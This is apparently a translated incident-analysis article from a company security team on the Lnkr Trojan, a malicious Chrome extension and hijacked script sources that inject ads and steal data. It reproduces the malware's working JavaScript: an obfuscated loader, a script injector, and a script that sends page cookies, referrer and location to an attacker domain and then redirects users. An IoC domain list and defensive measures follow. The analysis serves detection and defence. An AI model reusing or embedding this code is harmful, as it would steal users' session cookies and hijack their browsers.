This article analyzes the Lnkr Trojan from the perspectives of black product attack methods, Trojan horse malicious behavior, monitoring and defense schemes, etc. This type of Trojan has a wide range of influence and various attack methods, but the current domestic relevant information is very scarce. I hope this article's practical experience And the summary can be helpful to students who are engaged in related safety testing.
1. Event overview
In October 2020, the Meituan security operation platform found malicious JavaScript requests in the traffic. The Information Security Department immediately began emergency handling after receiving the warning. Through the investigation of the network environment, access logs, etc., the malicious request was finally locked and installed by the Chrome browser. Caused by a malicious plug-in, the malicious JavaScript file will steal cookies and force users to jump to malicious pornographic sites, promotion links, etc., combined with Meituan threat intelligence big data, it is found that the plug-in is consistent with the characteristics of the Lnkr Ad Injector Trojan.
This type of Trojan has a variety of propagation methods. Malicious code is implanted in the page through browser plug-ins, Broken Link Hijacking, etc., which not only seriously affects the normal access of users but also steals user data. Tracking analysis found that many large domestic Internet sites (Alexa ranked top 600 in the world) were infected, affecting the online security of hundreds of millions of netizens. It is recommended that major platforms check the third-party loading sources of their systems and internal terminal devices to avoid such cases. Trojan attack.
Second, the traceability process
2.1 The security operation platform issues an abnormal alarm
The Chrome sandbox detected malicious JavaScript files and issued an abnormal warning:
The basic attack behavior judged by the alarm information is:
-
The user visits the normal page;
-
The page loads an external JavaScript file (A): http://s3.amazonaws.com/js-static/18ced489204f8ff908.js;
-
A loads the second JavaScript file (B): http://countsource.cool/18ced489204f8ff908.js;
-
B contains malicious code and sends sensitive information such as cookies to the remote domain name.
2.2 Analyze the attack path
According to the trigger page and related network environment information involved in the alarm, exclude traffic hijacking, XSS attacks, etc., and guess the possible cause is caused by browser plug-ins or malware.
Through the sandbox analysis of all Chrome plug-ins on the problem device, it was found that a Chrome plug-in code named Vysor had malicious behavior. The detection results are as follows:
{
"call_window_location": {
"info": "get document.location",
"capture": []
},
"call_document_createElement": {
"info": "call document.createElement, create script element",
"capture": [
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:INPUT",
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:SCRIPT",
"create element elementName:LINK"
]
},
"call_document_removeChild": {
"info": "call document.removeChild",
"capture": [
"remove element {elementName:fieldset}",
"remove element {elementName:fieldset}",
"remove element {elementName:fieldset}"
]
},
"set_scriptSrcValue": {
"info": "set script src unsafe value",
"capture": [
"//s3.amazonaws.com/js-static/18ced489204f8ff908.js"
]
}
}You can see that the plug-in code creates the script tag, and then sets the src attribute of the script tag to //s3.amazonaws.com/js-static/18ced489204f8ff908.js.
2.3 Malicious code analysis of plugins
In order to further study the characteristics of the organization's Trojan horse, we manually analyzed the code of the malicious plug-in. The malicious plug-in has a large amount of code, a messy structure, and a large amount of interference code.
First, the malicious code pre-sets many strings with no obvious meaning to construct Payload.
These strings are finally constructed by a series of conversions in the following methods to create a script tag statement document'createElement', and the doctype is the created script object.
Next, assign a value to the src attribute of the script object. In the addHandler method, the cl parameter is passed by elem, which contains the src string, which is obtained through cl[0].split('>').slice(2, 3) The keyword src and tag are the doctype variables mentioned above, that is, the script object. In the part of constructing the src value, you can see that there is a string in the constant that looks like a base64 string:
mawaid = '^\\%|PCQxPjwkMT5zM|y5hbWF6b25hd3Mu|?:^[^\\\\]+?:\\%\\.*\t'The malicious code uses this string and other preset variables to perform a series of conversions to finally form the base64 load address PCQxPjwkMT5zMy5hbWF6b25hd3MuY29tPCQxPmpzLXN0YXRpYzwkMT4xOGNlZDQ4OTIwNGY4ZmY5MDguanM:
Solve base64 through the createLinkPseudo method, and form a malicious address //s3.amazonaws.com/js-static/18ced489204f8ff908.js after replacement.
The main purpose of s3.amazonaws.com/js-static/18ced489204f8ff908.js is to load the next level of malicious Javascript file (//countsource.cool/18ced489204f8ff908.js), the code is as follows:
(function(){var a=document.createElement("script");a.src="//countsource.cool/18ced489204f8ff908.js";(document.head||document.documentElement).appendChild(a)})();;
//countsource.cool/18ced489204f8ff908.js file content is:
(function () {
function initXMLhttp() {
var xmlhttp;
if (window.XMLHttpRequest) {
xmlhttp = new XMLHttpRequest();
} else {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
return xmlhttp;
}
function minAjax(config) {
if (!config.url) {
return;
}
if (!config.type) {
return;
}
if (!config.method) {
config.method = true;
}
if (!config.debugLog) {
config.debugLog = false;
}
var sendString = [],
sendData = config.data;
if (typeof sendData === "string") {
var tmpArr = String.prototype.split.call(sendData, '&');
for (var i = 0, j = tmpArr.length; i < j; i++) {
var datum = tmpArr[i].split('=');
sendString.push(encodeURIComponent(datum[0]) + "=" + encodeURIComponent(datum[1]));
}
} else if (typeof sendData === 'object' && !(sendData instanceof String)) {
for (var k in sendData) {
var datum = sendData[k];
if (Object.prototype.toString.call(datum) == "[object Array]") {
for (var i = 0, j = datum.length; i < j; i++) {
sendString.push(encodeURIComponent(k) + "[]=" + encodeURIComponent(datum[i]));
}
} else {
sendString.push(encodeURIComponent(k) + "=" + encodeURIComponent(datum));
}
}
}
sendString = sendString.join('&');
if (window.XDomainRequest) {
var xmlhttp = new window.XDomainRequest();
xmlhttp.onload = function () {
if (config.success) {
config.success(xmlhttp.responseText);
}
};
xmlhttp.open("POST", config.url);
xmlhttp.send(sendString);
} else {
var xmlhttp = initXMLhttp();
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
if (config.success) {
config.success(xmlhttp.responseText, xmlhttp.readyState);
}
} else {}
}
if (config.type == "GET") {
xmlhttp.open("GET", config.url + "?" + sendString, config.method);
xmlhttp.send();
}
if (config.type == "POST") {
xmlhttp.open("POST", config.url, config.method);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.send(sendString);
}
}
}
dL();
function dL() {
var host = 'http://press.cdncontentdelivery.com/f';
var config = {
url: host + "/stats.php",
type: "POST",
data: {
vbase: document.baseURI,
vhref: location.href,
vref: document.referrer,
k: "Y291bnRzb3VyY2UuY29vbA==",
ck: document.cookie,
t: Math.floor(new Date().getTime() / 1000),
tg: ""
},
success: onSuccessCallback
};
function bl(resp) {
! function (dr) {
function t() {
return !!localStorage && localStorage.getItem(a)
}
function e() {
o(),
parent.top.window.location.href = c
}
function o() {
var t = r + i;
if (localStorage) {
localStorage.setItem(a, t)
}
}
function n() {
if (t()) {
var o = localStorage && localStorage.getItem(a);
r > o && e()
} else e()
}
var a = "MenuIdentifier",
r = Math.floor((new Date).getTime() / 1e3),
c = dr,
i = 86400;
n()
}(resp);
}
function onSuccessCallback(response) {
if (response && response.indexOf('http') > -1) {
bl(response);
}
}
minAjax(config);
}
})();This file is the code that really realizes the malicious behavior. This part of the code has not been obfuscated, encrypted, or added other meaningless code to interfere with the analysis. The malicious behavior can be clearly seen:
-
Get the current page Cookie, ck parameters;
-
Get the Referrer of the current page;
-
Get the current page Location;
-
Use XMLHttpRequest to send the acquired data to http://press.cdncontentdelivery.com/f/stats.php;
-
Use the onSuccessCallback method to jump.
So far, the cookie is sent to the remote receiving address, and then the content is returned through onSuccessCallback to complete the jump. The complete process:
2.4 In-depth investigation through discovered IoC
Through the above features, a large number of domain names and plug-ins related to the Lnkr Trojan were discovered, some of which did not appear in the known threat intelligence. After further analysis, it was found that the mobile terminal equipment also triggered malicious requests.
In addition, we have also found that many large domestic sites have introduced Lnkr Trojan horses on their own reference resources. If users visit these sites, cookie information will be directly sent to the remote site, which poses a high security risk. In view of the existence of malicious resources on the site itself, it is very likely that an attacker uses Broken Link Hijacking to preemptively register an expired domain name, and the site is hijacked to malicious resources when accessing the original resources.
Three, summary
3.1 Malicious domain name
The following lists the malicious domains found in this detection:
-
mirextpro.com
-
browfileext.com
-
nextextlink.com
-
lisegreen.biz
-
makesure.biz
-
clipsold.com
-
comtakelink.xyz
-
protesidenext.com
-
promfflinkdev.com
-
rayanplug.xyz
-
countsource.cool
-
blancfox.com
-
skipush1.bbn.com.cn
-
donewrork.org
-
loungesrc.net
-
higedev.cool
-
s3.amazonaws.com/cashe-js/
-
s3.amazonaws.com/js-cache/
-
s3.amazonaws.com/jsfile/
-
s3.amazonaws.com/cashe-js/
-
cdngateway.net (Domain name for receiving cookies)
-
sslproviders.net (Domain name for receiving cookies)
-
cdncontentdelivery.com (Domain name for receiving cookies)
3.2 Malicious plug-ins
Malicious plug-ins with the characteristics of Lnkr Trojan horse were detected:
Screenshot of some malicious plugins:
Fourth, review
What are the hazards caused by the Lnkr Trojan?
One of the core domains of the Lnkr Trojan, cdngateway.net, ranks 8900 in global domain traffic. From the perspective of traffic sources, the traffic brought by redirects from external websites accounted for 65.48% of the total traffic. It can be seen that its attack range is extremely wide and affected by it. The number of applications and users is also very large.
This type of Trojan can cause serious harm to both external users and internal employees.
In terms of external users, if the company does not strictly control the loading of third-party resources in the system, the hackers use Broken Link Hijacking attack methods, causing the business system to be hijacked and implanted with malicious code when loading resources, which will seriously affect user experience, information security and corporate image .
From the perspective of internal employees, traditional anti-virus, EDR and other terminal security devices cannot well identify such malicious plug-ins. Attackers use malicious browser plug-ins to control employees’ browsers to load remote malicious resources, not only for ad injection Compared with other attack methods against browsers, it can achieve more stability and trigger a wider range of sensitive information stealing, intranet detection, etc. In the malicious requests blocked by CSP history, we also found that in addition to stealing cookie information, There are also cases where malicious code steals page text information. These text information is likely to contain a large number of sensitive information such as users and orders in the internal platform of the enterprise.
How to find such malicious Trojan horse implants?
For malicious browser plug-ins, the cost of static analysis of the code in terms of detection is relatively high. The payload that triggers the malicious request is constructed through a large number of encoding conversions, splicing, and regular matching, and has gone through many methods that have no practical meaning. In terms of dynamic analysis, since the Chrome plug-in code will call the Chrome background API, it may not be able to call the API in a regular sandbox environment and an error exit may occur midway. The analysis also found that many malicious behaviors need to trigger specific events to enter the process of constructing malicious payloads, such as triggering chrome.tabs.onUpdated.
For browser plug-in security, you can detect and protect it in the following ways:
-
It is forbidden to install plug-ins that are not online in the Chrome App Store (except plug-ins developed by the company);
-
Perform a lightweight investigation on the plug-in manfiest.json file. The application permissions in the manfiest.json file are relatively sensitive, such as cookies, tabs, webRequest, etc.;
-
Use content security policy (CSP) to intercept or monitor requests initiated by application pages, and combine static and dynamic analysis techniques to determine JavaScript file behavior;
-
Use browser sandbox and EDR to scan browser plug-ins regularly;
-
Establish the detection capability of the network layer, and promptly deal with malicious requests if they are found.
Regarding whether the business system itself loads malicious resources:
-
Strictly control the third-party resources loaded by the system;
-
Through the content security policy (CSP) to intercept or monitor the request triggered by the page.
to sum up
Black production organizations use this type of Trojan to conduct malicious traffic and steal user information, which brings security risks to user access and endangers the company’s own image. In the HTTPS scenario, although the risk of hijacking user access on the link is eliminated, The security of the user-side access environment is uncertain. To ensure that the information obtained by the user is reliable and has not been tampered with, further protection is still needed. I hope this article can bring you some help or inspiration.
---------- END ----------
Job Offers
The Meituan security team is working hard to build an in-depth application security system for language virtual machines—basic services—upper applications. It is urgently needed for students interested in R&D security to join! Welcome to send your resume to [email protected] (please specify the subject of the email: R&D Security Expert-City-Meituan SRC)
Maybe you still want to watch
| New Exploration of Internet Company Data Security Protection
| Front-end Security Series 2: How to prevent CSRF attacks?
| Internet companies: How to build a data security system?